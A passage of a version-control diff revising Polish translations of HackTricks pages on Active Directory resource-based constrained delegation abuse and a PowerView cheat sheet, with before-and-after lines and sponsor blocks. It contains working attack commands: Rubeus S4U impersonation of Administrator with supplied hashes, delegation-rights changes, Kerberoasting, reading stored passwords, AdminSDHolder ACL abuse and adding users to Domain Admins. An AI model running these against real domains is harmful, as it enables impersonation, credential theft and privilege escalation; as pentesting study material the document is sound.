2. S4U2Proxy: Użyj **nie Forwardable TGS** z poprzedniego kroku, aby poprosić o **TGS** od **Administratora** do **komputera ofiary**.
3. Nawet jeśli używasz nie Forwardable TGS, ponieważ wykorzystujesz delegację ograniczoną opartą na zasobach, zadziała.
4. Atakujący może **przekazać bilet** i **podszycić się** pod użytkownika, aby uzyskać **dostęp do usługi ofiary B**.
4. Atakujący może **przekazać bilet** i **podszycić się** pod użytkownika, aby uzyskać **dostęp do UsługiB ofiary**.
Aby sprawdzić _**MachineAccountQuota**_ domeny, można użyć:
```powershell
@ -63,14 +63,14 @@ New-MachineAccount -MachineAccount SERVICEA -Password $(ConvertTo-SecureString '
# Check if created
Get-DomainComputer SERVICEA
```
### Konfigurowanie ograniczonej delegacji opartej na zasobach
### Konfigurowanie Ograniczonej Delegacji Opartej na **Zasobach**
**Z użyciem modułu PowerShell activedirectory**
**Za pomocą modułu PowerShell activedirectory**
```powershell
Set-ADComputer $targetComputer -PrincipalsAllowedToDelegateToAccount SERVICEA$ #Assing delegation privileges
Get-ADComputer $targetComputer -Properties PrincipalsAllowedToDelegateToAccount #Check that it worked
```
**Za pomocą narzędzia powerview**
**Za pomocą powerview**
```powershell
$ComputerSid = Get-DomainComputer FAKECOMPUTER -Properties objectsid | Select -Expand objectsid
$SD = New-Object Security.AccessControl.RawSecurityDescriptor -ArgumentList "O:BAD:(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;$ComputerSid)"
@ -113,17 +113,17 @@ ls \\victim.domain.local\C$
```
### Nadużywanie różnych biletów usług
Dowiedz się o [**dostępnych biletach usług tutaj**](silver-ticket.md#dostępne-usługi).
Dowiedz się o [**dostępnych biletach usług tutaj**](silver-ticket.md#available-services).
## Błędy Kerberosa
* **`KDC_ERR_ETYPE_NOTSUPP`**: Oznacza to, że Kerberos jest skonfigurowany tak, aby nie używać DES ani RC4, a ty dostarczasz tylko skrót RC4. Dostarcz do Rubeusa co najmniej skrót AES256 (lub po prostu dostarcz skróty rc4, aes128 i aes256). Przykład: `[Rubeus.Program]::MainString("s4u /user:FAKECOMPUTER /aes256:CC648CF0F809EE1AA25C52E963AC0487E87AC32B1F71ACC5304C73BF566268DA /aes128:5FC3D06ED6E8EA2C9BB9CC301EA37AD4 /rc4:EF266C6B963C0BB683941032008AD47F /impersonateuser:Administrator /msdsspn:CIFS/M3DC.M3C.LOCAL /ptt".split())`
* **`KRB_AP_ERR_SKEW`**: Oznacza to, że czas bieżącego komputera różni się od czasu kontrolera domeny i Kerberos nie działa poprawnie.
* **`preauth_failed`**: Oznacza to, że podane nazwa użytkownika + skróty nie działają do logowania. Możliwe, że zapomniałeś wstawić "$" wewnątrz nazwy użytkownika podczas generowania skrótów (`.\Rubeus.exe hash /password:123456 /user:FAKECOMPUTER$ /domain:domain.local`)
* **`KRB_AP_ERR_SKEW`**: Oznacza to, że czas bieżącego komputera różni się od czasu kontrolera domeny (DC), a Kerberos nie działa poprawnie.
* **`preauth_failed`**: Oznacza to, że podane nazwa użytkownika + skróty nie działają przy logowaniu. Możliwe, że zapomniałeś dodać "$" wewnątrz nazwy użytkownika podczas generowania skrótów (`.\Rubeus.exe hash /password:123456 /user:FAKECOMPUTER$ /domain:domain.local`)
* **`KDC_ERR_BADOPTION`**: Może to oznaczać:
* Użytkownik, którego próbujesz podrobić, nie może uzyskać dostępu do żądanej usługi (ponieważ nie możesz go podrobić lub nie ma wystarczających uprawnień)
* Żądana usługa nie istnieje (jeśli prosisz o bilet dla winrm, a winrm nie jest uruchomiony)
* Stworzony fakecomputer stracił uprawnienia do podatnego serwera i musisz je przywrócić.
* Użytkownik, którego próbujesz podrobić, nie może uzyskać dostępu do żądanej usługi (ponieważ nie możesz go podrobić lub nie ma wystarczających uprawnień)
* Żądana usługa nie istnieje (jeśli prosisz o bilet dla winrm, a winrm nie jest uruchomiony)
* Stworzony fakecomputer stracił uprawnienia na podatnym serwerze i musisz je przywrócić.
## Odnośniki
@ -132,7 +132,7 @@ Dowiedz się o [**dostępnych biletach usług tutaj**](silver-ticket.md#dostępn
* [https://www.ired.team/offensive-security-experiments/active-directory-kerberos-abuse/resource-based-constrained-delegation-ad-computer-object-take-over-and-privilged-code-execution#modifying-target-computers-ad-object](https://www.ired.team/offensive-security-experiments/active-directory-kerberos-abuse/resource-based-constrained-delegation-ad-computer-object-take-over-and-privilged-code-execution#modifying-target-computers-ad-object)
* [https://stealthbits.com/blog/resource-based-constrained-delegation-abuse/](https://stealthbits.com/blog/resource-based-constrained-delegation-abuse/)
<figure><img src="/.gitbook/assets/WebSec_1500x400_10fps_21sn_lightoptimized_v2.gif" alt=""><figcaption></figcaption></figure>
<figure><img src="https://pentest.eu/RENDER_WebSec_10fps_21sec_9MB_29042024.gif" alt=""><figcaption></figcaption></figure>
{% embed url="https://websec.nl/" %}
@ -145,7 +145,7 @@ Inne sposoby wsparcia HackTricks:
* Jeśli chcesz zobaczyć swoją **firmę reklamowaną w HackTricks** lub **pobrać HackTricks w formacie PDF**, sprawdź [**PLANY SUBSKRYPCYJNE**](https://github.com/sponsors/carlospolop)!
* Zdobądź [**oficjalne gadżety PEASS & HackTricks**](https://peass.creator-spring.com)
* Odkryj [**Rodzinę PEASS**](https://opensea.io/collection/the-peass-family), naszą kolekcję ekskluzywnych [**NFT**](https://opensea.io/collection/the-peass-family)
* **Dołącz do** 💬 [**Grupy Discord**](https://discord.gg/hRep4RUj7f) lub [**grupy telegramowej**](https://t.me/peass) lub **śledź** nas na **Twitterze** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
* **Dołącz do** 💬 [**grupy Discord**](https://discord.gg/hRep4RUj7f) lub grupy [**telegramowej**](https://t.me/peass) lub **śledź** nas na **Twitterze** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
* **Podziel się swoimi sztuczkami hakerskimi, przesyłając PR-y do** [**HackTricks**](https://github.com/carlospolop/hacktricks) i [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
</details>

22
windows-hardening/basic-powershell-for-pentesters/powerview.md
View file

@ -4,7 +4,7 @@
<summary><strong>Naucz się hakować AWS od zera do bohatera z</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
* Czy pracujesz w **firmie z branży cyberbezpieczeństwa**? Chcesz zobaczyć swoją **firmę reklamowaną na HackTricks**? lub chcesz mieć dostęp do **najnowszej wersji PEASS lub pobrać HackTricks w formacie PDF**? Sprawdź [**PLANY SUBSKRYPCYJNE**](https://github.com/sponsors/carlospolop)!
* Czy pracujesz w **firmie zajmującej się cyberbezpieczeństwem**? Chcesz zobaczyć swoją **firmę reklamowaną na HackTricks**? lub chcesz mieć dostęp do **najnowszej wersji PEASS lub pobrać HackTricks w formacie PDF**? Sprawdź [**PLANY SUBSKRYPCYJNE**](https://github.com/sponsors/carlospolop)!
* Odkryj [**Rodzinę PEASS**](https://opensea.io/collection/the-peass-family), naszą kolekcję ekskluzywnych [**NFT**](https://opensea.io/collection/the-peass-family)
* Zdobądź [**oficjalne gadżety PEASS & HackTricks**](https://peass.creator-spring.com)
* **Dołącz do** [**💬**](https://emojipedia.org/speech-balloon/) [**grupy Discord**](https://discord.gg/hRep4RUj7f) lub [**grupy telegram**](https://t.me/peass) lub **śledź** mnie na **Twitterze** 🐦[**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
@ -12,7 +12,7 @@
</details>
<figure><img src="/.gitbook/assets/WebSec_1500x400_10fps_21sn_lightoptimized_v2.gif" alt=""><figcaption></figcaption></figure>
<figure><img src="https://pentest.eu/RENDER_WebSec_10fps_21sec_9MB_29042024.gif" alt=""><figcaption></figcaption></figure>
{% embed url="https://websec.nl/" %}
@ -141,7 +141,7 @@ Get-DomainOU "Servers" | %{Get-DomainComputer -SearchBase $_.distinguishedname -
Get-NetOU #Get Organization Units
Get-NetOU StudentMachines | %{Get-NetComputer -ADSPath $_} #Get all computers inside an OU (StudentMachines in this case)
```
### Logowanie i Sesje
### Logowanie i sesje
```powershell
Get-NetLoggedon -ComputerName <servername> #Get net logon users at the moment in a computer (need admins rights on target)
Get-NetSession -ComputerName <servername> #Get active sessions on the host
@ -151,8 +151,8 @@ Get-NetRDPSession -ComputerName <servername> #List RDP sessions inside a host (n
```
### Obiekt zasad grupy - GPO
Jeśli atakujący ma **wysokie uprawnienia wobec GPO**, może on wykorzystać to do **privesc**, nadając **uprawnienia użytkownikowi**, dodając **użytkownika lokalnego admina** do hosta lub tworząc **zaplanowane zadanie** (natychmiastowe) w celu wykonania akcji.\
Aby uzyskać [**więcej informacji na ten temat i jak go wykorzystać, kliknij ten link**](../active-directory-methodology/acl-persistence-abuse/#gpo-delegation).
Jeśli atakujący ma **wysokie uprawnienia wobec GPO**, może on wykorzystać je do **przywłaszczenia uprawnień** poprzez **dodanie uprawnień dla użytkownika**, **dodanie użytkownika jako administratora lokalnego** na hoście lub **utworzenie zaplanowanego zadania** (natychmiastowego) w celu wykonania akcji.\
Aby uzyskać [**więcej informacji na ten temat i dowiedzieć się, jak to wykorzystać, kliknij ten link**](../active-directory-methodology/acl-persistence-abuse/#gpo-delegation).
```powershell
#GPO
Get-DomainGPO | select displayName #Check the names for info
@ -186,7 +186,7 @@ Get-DomainGPOLocalGroup | select GPODisplayName, GroupName, GPOType
# Enumerates the machines where a specific domain user/group is a member of a specific local group.
Get-DomainGPOUserLocalGroupMapping -LocalGroup Administrators | select ObjectName, GPODisplayName, ContainerName, ComputerName
```
Dowiedz się, jak **wykorzystać uprawnienia w GPO i ACL** w:
Naucz się, jak **wykorzystać uprawnienia w GPO i ACL** w:
{% content-ref url="../active-directory-methodology/acl-persistence-abuse/" %}
[acl-persistence-abuse](../active-directory-methodology/acl-persistence-abuse/)
@ -236,7 +236,7 @@ Get-NetForestTrust #Get forest trusts (it must be between 2 roots, trust between
Get-DomainForeingUser #Get users with privileges in other domains inside the forest
Get-DomainForeignGroupMember #Get groups with privileges in other domains inside the forest
```
### Niski zawisający owoc
### Niski zawisły owoc
```powershell
#Check if any user passwords are set
$FormatEnumerationLimit=-1;Get-DomainUser -LDAPFilter '(userPassword=*)' -Properties samaccountname,memberof,userPassword | % {Add-Member -InputObject $_ NoteProperty 'Password' "$([System.Text.Encoding]::ASCII.GetString($_.userPassword))" -PassThru} | fl
@ -287,8 +287,6 @@ Get-ADObject -filter 'isDeleted -eq $true' -includeDeletedObjects -Properties *
"S-1-5-21-1874506631-3219952063-538504511-2136" | Convert-SidToName
```
#### Kerberoast
Kerberoast to technika polegająca na ataku na usługę Kerberos w celu uzyskania haseł użytkowników w postaci skróconych haseł.
```powershell
Invoke-Kerberoast [-Identity websvc] #Without "-Identity" kerberoast all possible users
```
@ -319,7 +317,7 @@ Add-DomainObjectAcl -TargetIdentity 'CN=AdminSDHolder,CN=System,DC=testlab,DC=lo
# Add user to 'Domain Admins'
Add-NetGroupUser -Username username -GroupName 'Domain Admins' -Domain my.domain.local
```
<figure><img src="/.gitbook/assets/WebSec_1500x400_10fps_21sn_lightoptimized_v2.gif" alt=""><figcaption></figcaption></figure>
<figure><img src="https://pentest.eu/RENDER_WebSec_10fps_21sec_9MB_29042024.gif" alt=""><figcaption></figcaption></figure>
{% embed url="https://websec.nl/" %}
@ -327,10 +325,10 @@ Add-NetGroupUser -Username username -GroupName 'Domain Admins' -Domain my.domain
<summary><strong>Naucz się hakować AWS od zera do bohatera z</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
* Czy pracujesz w **firmie z branży cyberbezpieczeństwa**? Chcesz zobaczyć, jak Twoja **firma jest reklamowana w HackTricks**? lub chcesz mieć dostęp do **najnowszej wersji PEASS lub pobrać HackTricks w formacie PDF**? Sprawdź [**PLANY SUBSKRYPCYJNE**](https://github.com/sponsors/carlospolop)!
* Czy pracujesz w **firmie zajmującej się cyberbezpieczeństwem**? Chcesz zobaczyć, jak Twoja **firma jest reklamowana w HackTricks**? lub chcesz mieć dostęp do **najnowszej wersji PEASS lub pobrać HackTricks w formacie PDF**? Sprawdź [**PLANY SUBSKRYPCYJNE**](https://github.com/sponsors/carlospolop)!
* Odkryj [**Rodzinę PEASS**](https://opensea.io/collection/the-peass-family), naszą kolekcję ekskluzywnych [**NFT**](https://opensea.io/collection/the-peass-family)
* Zdobądź [**oficjalne gadżety PEASS & HackTricks**](https://peass.creator-spring.com)
* **Dołącz do** [**💬**](https://emojipedia.org/speech-balloon/) [**Grupy Discord**](https://discord.gg/hRep4RUj7f) lub [**grupy telegramowej**](https://t.me/peass) lub **śledź** mnie na **Twitterze** 🐦[**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
* **Dołącz do** [**💬**](https://emojipedia.org/speech-balloon/) [**grupy Discord**](https://discord.gg/hRep4RUj7f) lub [**grupy telegramowej**](https://t.me/peass) lub **śledź** mnie na **Twitterze** 🐦[**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
* **Podziel się swoimi sztuczkami hakerskimi, przesyłając PR-y do [repozytorium hacktricks](https://github.com/carlospolop/hacktricks) i [repozytorium hacktricks-cloud](https://github.com/carlospolop/hacktricks-cloud)**.
</details>